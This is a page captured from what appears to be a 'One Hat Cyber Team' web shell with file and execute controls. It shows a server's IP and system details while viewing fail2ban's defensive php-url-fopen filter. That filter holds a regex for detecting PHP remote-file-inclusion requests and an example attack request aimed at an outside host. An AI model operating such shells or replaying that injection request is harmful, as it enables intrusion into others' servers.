⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
fail2ban
/
dist-config
/
filter.d
/
View File Name :
php-url-fopen.conf
# Fail2Ban filter for URLs with a URL as a script parameters # which can be an indication of a fopen url php injection # # Example of web requests in Apache access log: # 66.185.212.172 - - [26/Mar/2009:08:44:20 -0500] "GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm? HTTP/1.1" 200 114 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" [Definition] failregex = ^<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$ ignoreregex = # DEV Notes: # # Version 2 # fixes the failregex so REFERERS that contain =http:// don't get blocked # (mentioned by "fasuto" (no real email provided... blog comment) in this entry: # http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html#comment-1489 # # Author: Arturo 'Buanzo' Busleiman <buanzo@buanzo.com.ar> datepattern = ^[^\[]*\[({DATE}) {^LN-BEG}